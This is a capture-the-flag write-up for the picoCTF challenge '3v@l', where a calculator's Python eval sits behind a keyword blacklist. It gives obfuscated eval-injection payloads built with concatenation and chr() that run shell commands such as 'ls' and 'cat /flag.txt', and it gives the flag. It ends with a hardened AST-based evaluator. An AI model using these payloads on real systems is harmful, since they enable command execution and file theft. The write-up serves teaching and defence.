3v@l

Published: April 2, 2025. Updated: December 9, 2025.

Description

ABC Bank’s loan calculator naively feeds user input to Python’s eval while blocking only a short keyword list. Get around the filter to execute shell commands and read /flag.txt.

Load the calculator page and inspect the script block; keywords such as os, eval, ls, cat and / are blacklisted.

Craft Python expressions with string concatenation and chr() so the filter never sees a forbidden token as a literal substring.

__import__('o'+'s').popen('l'+'s').read()
__import__('o'+'s').popen('c'+'at '+chr(47)+'*').read()

Solution

  1. Step 1: Bypass the filter
    Instead of typing os directly, build it dynamically (`'o'+'s'`), and do the same for command names. chr(47) yields `/`, so a path can be spelled out without a literal slash.
  2. Step 2: Dump the filesystem
    List the root directory (`ls /`) to confirm flag.txt exists, then run a cat payload (e.g., `__import__('o'+'s').popen('c'+'at '+chr(47)+'flag.txt').read()`) to output the flag.

Flag

picoCTF{D0nt_Use_Unsecure_f@nctionsd06...}

Any payload that spawns /bin/sh via the obfuscated os import works; the concatenation trick keeps the blacklist asleep.
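Why the substring blacklist fails and what a fixed calculator looks like, as an added example (not the challenge's own code; the blacklist below is a constructed approximation of the one the page describes). The hardened version parses the input and accepts only arithmetic AST nodes, so nothing the user types is ever handed to eval.

```python
import ast
import operator

# Constructed blacklist in the spirit of the challenge's filter (the real list
# is not reproduced on this page); the check is a plain substring match.
BLACKLIST = ("os", "eval", "ls", "cat", "/")

def blacklist_allows(expr: str) -> bool:
    """The weak check: an expression passes if no forbidden token appears literally."""
    return not any(token in expr for token in BLACKLIST)

# Hardened replacement: parse the input and walk its AST, accepting only numeric
# literals and basic arithmetic. Names, calls, attributes and string literals are
# refused before anything is evaluated, so spelling 'o'+'s' gains nothing.
SAFE_BINOPS = {ast.Add: operator.add, ast.Sub: operator.sub,
               ast.Mult: operator.mul, ast.Div: operator.truediv}
SAFE_UNARY = {ast.USub: operator.neg, ast.UAdd: operator.pos}

def safe_calc(expr: str):
    """Evaluate an arithmetic-only expression; raise ValueError on anything else."""
    def ev(node: ast.AST):
        if isinstance(node, ast.Expression):
            return ev(node.body)
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return node.value          # type() check also excludes bool
        if isinstance(node, ast.BinOp) and type(node.op) in SAFE_BINOPS:
            return SAFE_BINOPS[type(node.op)](ev(node.left), ev(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in SAFE_UNARY:
            return SAFE_UNARY[type(node.op)](ev(node.operand))
        raise ValueError(f"disallowed syntax: {type(node).__name__}")
    return ev(ast.parse(expr, mode="eval"))

def is_rejected(expr: str) -> bool:
    """True if the hardened evaluator refuses the expression outright."""
    try:
        safe_calc(expr)
    except (ValueError, SyntaxError):
        return True
    return False

if __name__ == "__main__":
    payload = "__import__('o'+'s').popen('l'+'s').read()"
    print("blacklist allows payload:", blacklist_allows(payload))   # True
    print("AST evaluator rejects it:", is_rejected(payload))        # True
    print("loan arithmetic still works:", safe_calc("(1200 + 300) * 2 - 10"))  # 2990
```

The payload is never executed here: the point is that the blacklist returns "allowed" for the obfuscated form while the AST walk refuses it at the first Call node.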